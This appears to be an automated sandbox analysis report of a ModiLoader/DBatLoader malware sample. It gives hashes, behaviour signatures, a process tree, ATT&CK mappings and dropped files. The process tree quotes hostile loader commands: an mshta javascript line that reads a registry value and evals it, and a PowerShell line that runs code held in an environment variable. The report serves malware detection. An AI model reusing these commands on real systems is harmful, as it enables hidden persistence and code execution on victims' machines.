Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-05-2024 23:45

General

  • Target

    7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe

  • Size

    798KB

  • MD5

    7735c4474b9b25f5a2474f33e92cfa5a

  • SHA1

    2726cfc028852c098fc567ce37c99472b4a9978a

  • SHA256

    70a17f882746bc26e6857b612292d72779adfcef08dbe07125f510a1f6a00767

  • SHA512

    3f1c0be3e9c93a689a5ea53cc250ff2acfea00e3d584392161ad0f9c93ce830c36524c945e76a277938f35282fb10b0eb7bd59e49d1e33330196b4c26e8c2fc1

  • SSDEEP

    12288:2TW7lerECtu4aLgbqu6khVc0qI7oe3gP9WDMLMnNTloICn/dD:7perrOUj6k7ZqC30laplcD

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 11 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:516
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe hFKbVbXGFgZEbFHOcIE
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3420
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
        - CmdLine Args
        3⤵
        • Executes dropped EXE
        PID:688
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:ZJGUWc1="L";FD1=new%20ActiveXObject("WScript.Shell");dSIpm2X3U="mw7Nqfn";KHQD39=FD1.RegRead("HKLM\\software\\Wow6432Node\\n5XmbnPSb\\rLiYok5b");HXRsFo5ip="xWM4O";eval(KHQD39);CBX9uPS4="KNzKZfXOUy";
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4864
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:kuccupa
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:744

Network

MITRE ATT&CK Matrix ATT&CK v13

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNWSNYYcGVY
    Filesize

    211KB

    MD5

    9aef2abd0658a459108bdc4f659fcae2

    SHA1

    4f6512429e1aac5dff5b5d3417e36eb98042d8ee

    SHA256

    6a718ee45df6706865c7f1f1a693bd73527d3bde029e4e8ad22fc27363c726f0

    SHA512

    d08c91c20a2dd7792a14985987a82dfebe3e1935ec133f97772e22da17329e32edff0067c3067f14f9acac33b1d71e58d1da96f495005f7f846b8a7362adb70e

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIE
    Filesize

    28KB

    MD5

    cc1abc36dc3e6caea01502fae289e5a1

    SHA1

    69acfc8145aaa55e6dc28289e70f1c5988888123

    SHA256

    dcd07910888e5be21e7503c76bef0da632e17e3775de349b1ab1fcbf75a3b093

    SHA512

    289a39d8791799982fbcaac30a8840a804da162d1562cf5f6fa502e742174ea5257483a7c786bd8dc1571e7d48b1ed2e949800ccb76a2fbe6c4411e2a5e81af2

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
    Filesize

    732KB

    MD5

    71d8f6d5dc35517275bc38ebcc815f9f

    SHA1

    cae4e8c730de5a01d30aabeb3e5cb2136090ed8d

    SHA256

    fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b

    SHA512

    4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4jylg5q.0aq.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/688-34-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-27-0x0000000000400000-0x0000000000439000-memory.dmp
    Filesize

    228KB

  • memory/688-28-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-30-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-31-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-32-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-33-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-29-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-18-0x0000000000400000-0x0000000000439000-memory.dmp
    Filesize

    228KB

  • memory/688-35-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/688-57-0x0000000001300000-0x00000000013D4000-memory.dmp
    Filesize

    848KB

  • memory/744-38-0x0000000005E40000-0x0000000006468000-memory.dmp
    Filesize

    6.2MB

  • memory/744-39-0x0000000005A10000-0x0000000005A32000-memory.dmp
    Filesize

    136KB

  • memory/744-40-0x0000000005BB0000-0x0000000005C16000-memory.dmp
    Filesize

    408KB

  • memory/744-41-0x0000000005C20000-0x0000000005C86000-memory.dmp
    Filesize

    408KB

  • memory/744-51-0x0000000006470000-0x00000000067C4000-memory.dmp
    Filesize

    3.3MB

  • memory/744-52-0x0000000005E20000-0x0000000005E3E000-memory.dmp
    Filesize

    120KB

  • memory/744-53-0x00000000067E0000-0x000000000682C000-memory.dmp
    Filesize

    304KB

  • memory/744-54-0x0000000008030000-0x00000000086AA000-memory.dmp
    Filesize

    6.5MB

  • memory/744-55-0x0000000006CD0000-0x0000000006CEA000-memory.dmp
    Filesize

    104KB

  • memory/744-37-0x0000000003080000-0x00000000030B6000-memory.dmp
    Filesize

    216KB

  • memory/3420-17-0x0000000003820000-0x0000000003821000-memory.dmp
    Filesize

    4KB